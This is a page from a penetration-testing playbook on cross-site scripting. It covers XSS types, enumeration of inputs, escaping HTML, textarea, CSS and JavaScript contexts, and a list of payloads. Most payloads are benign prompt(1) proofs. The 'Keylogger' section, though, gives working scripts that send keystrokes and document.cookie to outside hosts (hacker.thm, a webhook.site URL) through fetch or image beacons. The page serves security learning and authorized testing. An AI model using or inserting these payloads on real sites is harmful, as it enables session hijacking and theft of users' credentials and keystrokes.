Ctrlk

Tech With Z Pentest Playbook Defense Playbook

Cross-Site Scripting (XSS)

Cross-site scripting (XSS) is a web security vulnerability that allows attackers to inject malicious scripts (usually Javascript) into a website, which are then executed by the user's browser.

Cross-site scripting works by manipulating a vulnerable web site so that it returns malicious JavaScript to users. When the malicious code executes inside a victim's browser, the attacker can fully compromise their interaction with the application.

XSS Types

Reflected XSS (a.k.a. Non-persistent XSS / Type 1 XSS)
Stored XSS (a.k.a. Persistent XSS / Type 2 XSS)
DOM-based XSS (a.k.a. Type 0 XSS)

Enumeration

Look for possible user inputs
- Form in a page (text field, etc.)
- URL Parameter (/page/?name=test123)
- Body
  POST, GET, PUT requests
- POST data
- Hidden form field values
- Predefined radio or selection values
Enter a unique text, this can help you easily find where your input shows up in the application
- Search for your input using dev tools
- If there are multiple parameters in the request, try to test those as well and look where those inputs shows up in the application

Testing for XSS

HTML Injection

Test if you can include HTML tags to your input, basically performing HTML Injection
- Example: ><u>test123</u>
Once you’ve confirmed that HTML Injection is possible, you can go ahead and test for XSS for that input.

Testing XSS

Test if you can execute javascript by adding event listener to the html tag.
- The list of event listners can be found here:
Can you execute javascript by adding script tags?
Refer to the Basic XSS Payload sections below

Identifying and Escaping XSS context

There are different ways to escape XSS context depending where your input is placed.
Understand the context of which your text is put into. Remember to identify the code structure and modify/insert characters to exit out of context but still having a valid code for the browser to process.
When you enter an input look how your input is being rendered in the page.
Use the dev tools and check the HTML elements
What tag does your input rendered to?
- Value in an input tag
- Paragraph tag
- Text area tag
- Title
- Javascript variable
Can you escape that tag to be able to insert javascript code?
Refer to the XSS Context section below

Basic XSS Payloads

Calling Javascript

<script>prompt(1)</script>

# Loading a Javascript as URL
javascript:prompt(1)
<a%20href=javascript:prompt(1)>test-link
<iframe src=javascript:prompt(1)>

# Creating Object
<object data="data:text/html,<script>prompt(1)</script>"></object>
<script src=data:text/javascript,prompt(1)></script>

XSS via IMG tag

<img src=x onerror="prompt(1)">
<img src=x onmouseover="prompt('test')">

XSS Context

Basic Tag / Input tag

# Escaping tag 
test123">

# Escaping tag and inserting javascript
test123"><script>prompt(1)</script>

# Inserting event listener
test123" onmouseover="prompt(1)">
test123" onmouseover="prompt(1);//">

Text Area / Title

In text area tag, input is rendered as plain text. You would need to insert a closing tag to escape the context.

test123</textarea><script>prompt(1)</script>
test123</textarea><img src=x onerror=prompt(1)>

# Title
test123</title><img src=x onerror=prompt(1)>

Style Tag / CSS

Follow how the CSS code is structured.

#3FFFFFF;}</style><img src=x onerror=prompt(1)>

Javascript Variable

Sometimes you may encounter that your input is placed into a javascript variable to be processed/rendered. Look how your input is being placed into the code and insert characters so that you can escape out of this context but still have a valid javascript code. From there you can insert your XSS code.

test123'; prompt(1);//

XSS Payloads

Keylogger

function logKey(event){console.log(event.key)}
document.addEventListener('keydown',logKey)

<script>document.onkeypress = function(e) { fetch('<https://hacker.thm/log?key=>' + btoa(e.key) );}</script>

<img src="x" onerror="fetch('<https://webhook.site/5d37959e-1bdc-441f-8d33-e6abbed68bc3/'+document.cookie>); " />

<script>fetch('<https://hacker.thm/steal?cookie=>' + btoa(document.cookie));</script>

<script>var i=new Image;i.src="[URL]/?"+document.cookie;</script>

Other Payloads

%27";}</script><script>prompt(document.domain);</script>

References / Resources

Web Security Academy XSS: https://portswigger.net/web-security/cross-site-scripting
OWASP WSTG XSS: https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting
Event Listener: https://www.w3schools.com/jsref/dom_obj_event.asp

PreviousSite / Application Review NextInsecure Direct Object References (IDOR)

Last updated 6 months ago